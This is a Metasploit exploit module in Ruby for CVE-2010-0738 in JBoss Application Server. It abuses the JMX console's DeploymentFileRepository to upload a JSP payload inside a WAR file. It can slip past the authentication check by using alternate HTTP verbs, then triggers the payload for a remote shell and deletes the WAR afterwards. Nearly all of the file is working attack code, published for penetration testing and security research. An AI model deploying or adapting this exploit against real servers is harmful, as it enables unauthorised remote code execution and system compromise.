##
# $Id: jboss_deploymentfilerepository.rb 9950 2010-08-03 15:14:34Z jduck $
##
##
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# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss Java Class DeploymentFileRepository WAR deployment',
'Description' => %q{
This module uses the DeploymentFileRepository class in
JBoss Application Server (jbossas) to deploy a JSP file
in a minimal WAR context.
},
'Author' => [ 'MC', 'Jacob Giannantonio', 'Patrick Hof' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9950 $',
'References' =>
[
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ]
],
'Privileged' => false,
'Platform' => ['linux', 'windows' ],
'Targets' =>
[
[ 'Universal',
{
'Arch' => ARCH_JAVA,
'Payload' =>
{
'DisableNops' => true,
},
}
],
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('SHELL', [ true, "The system shell to use.", 'automatic']),
OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
OptString.new('PATH', [ true, 'The URI path of the JMX console', '/jmx-console' ]),
OptString.new('VERB', [ true, "The HTTP verb to use", "POST"]),
], self.class)
end
def exploit
jsp_name = datastore['JSP'] || rand_text_alphanumeric(8+rand(8))
app_base = datastore['APPBASE'] || rand_text_alphanumeric(8+rand(8))
p = payload
if datastore['SHELL'] == 'automatic'
if not (plat = detect_platform())
raise RuntimeError, 'Unable to detect platform!'
end
case plat
when 'linux'
datastore['SHELL'] = '/bin/sh'
when 'win'
datastore['SHELL'] = 'cmd.exe'
end
print_status("SHELL set to #{datastore['SHELL']}")
return if ((p = exploit_regenerate_payload(plat, target_arch)) == nil)
end
#
# UPLOAD
#
data = 'action=invokeOpByName'
data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
data << '&methodName=store'
data << '&argType=java.lang.String'
data << '&arg0=' + Rex::Text.uri_encode(app_base) + '.war'
data << '&argType=java.lang.String'
data << '&arg1=' + jsp_name
data << '&argType=java.lang.String'
data << '&arg2=.jsp'
data << '&argType=java.lang.String'
data << '&arg3=' + Rex::Text.uri_encode(p.encoded)
data << '&argType=boolean'
data << '&arg4=True'
if (datastore['VERB'] == "POST")
res = send_request_cgi(
{
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'method' => datastore['VERB'],
'data' => data
}, 5)
else
res = send_request_cgi(
{
'uri' => datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
'method' => datastore['VERB'],
}, 5)
end
#
# EXECUTE
#
# Using HEAD may trigger a 500 Internal Server Error (at leat on 4.2.3.GA),
# but the file still gets written.
if (res.code == 200 || res.code == 500)
uri = '/' + app_base + '/' + jsp_name + '.jsp'
print_status("Triggering payload at '#{uri}'...")
verb = 'GET'
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
verb = 'HEAD'
end
# JBoss might need some time for the deployment. Try 5 times at most
# and sleep 3 seconds in between.
5.times do
res = send_request_raw(
{
'uri' => uri,
'method' => verb,
})
if !res
print_error("Execution failed on '#{uri}' [No Response], retrying...")
select(nil,nil,nil,3)
elsif (res.code < 200 or res.code >= 300)
print_error("Execution failed on '#{uri}' [#{res.code} #{res.message}], retrying...")
select(nil,nil,nil,3)
elsif res.code == 200
print_status("Successfully triggered payload at '#{uri}'.")
break
else
print_error("Denied...")
end
end
#
# DELETE
#
# The WAR can only be removed by physically deleting it, otherwise it
# will get redeployed after a server restart.
print_status("Undeploying #{uri} by deleting the WAR file via DeploymentFileRepository.remove()...")
res1 = delete_file(Rex::Text.uri_encode(app_base) + '.war', jsp_name, '.jsp')
res2 = delete_file('./', Rex::Text.uri_encode(app_base) + '.war', '')
[res1, res2].each do |res|
if !res
print_error("WARNING: Unable to remove WAR [No Response]")
end
if (res.code < 200 || res.code >= 300)
print_error("WARNING: Unable to remove WAR [#{res.code} #{res.message}]")
end
end
handler
end
end
# Delete a file with DeploymentFileRepository.remove().
def delete_file(folder, name, ext)
data = 'action=invokeOpByName'
data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
data << '&methodName=remove'
data << '&argType=java.lang.String'
data << '&arg0=' + folder
data << '&argType=java.lang.String'
data << '&arg1=' + name
data << '&argType=java.lang.String'
data << '&arg2=' + ext
if (datastore['VERB'] == "POST")
res = send_request_cgi(
{
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'method' => datastore['VERB'],
'data' => data
}, 5)
else
res = send_request_cgi(
{
'uri' => datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
'method' => datastore['VERB'],
}, 5)
end
res
end
def detect_platform
print_status("Attempting to automatically detect the platform...")
path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
res = send_request_raw(
{
'uri' => path,
}, 20)
if (not res) or (res.code != 200)
print_error("Failed: Error requesting #{path}")
return nil
end
if (res.body =~ /<td.*?OSName.*?(Linux|Windows).*?<\/td>/m)
os = $1
if (os =~ /Linux/i)
return 'linux'
elsif (os =~ /Windows/i)
return 'win'
end
end
nil
end
end
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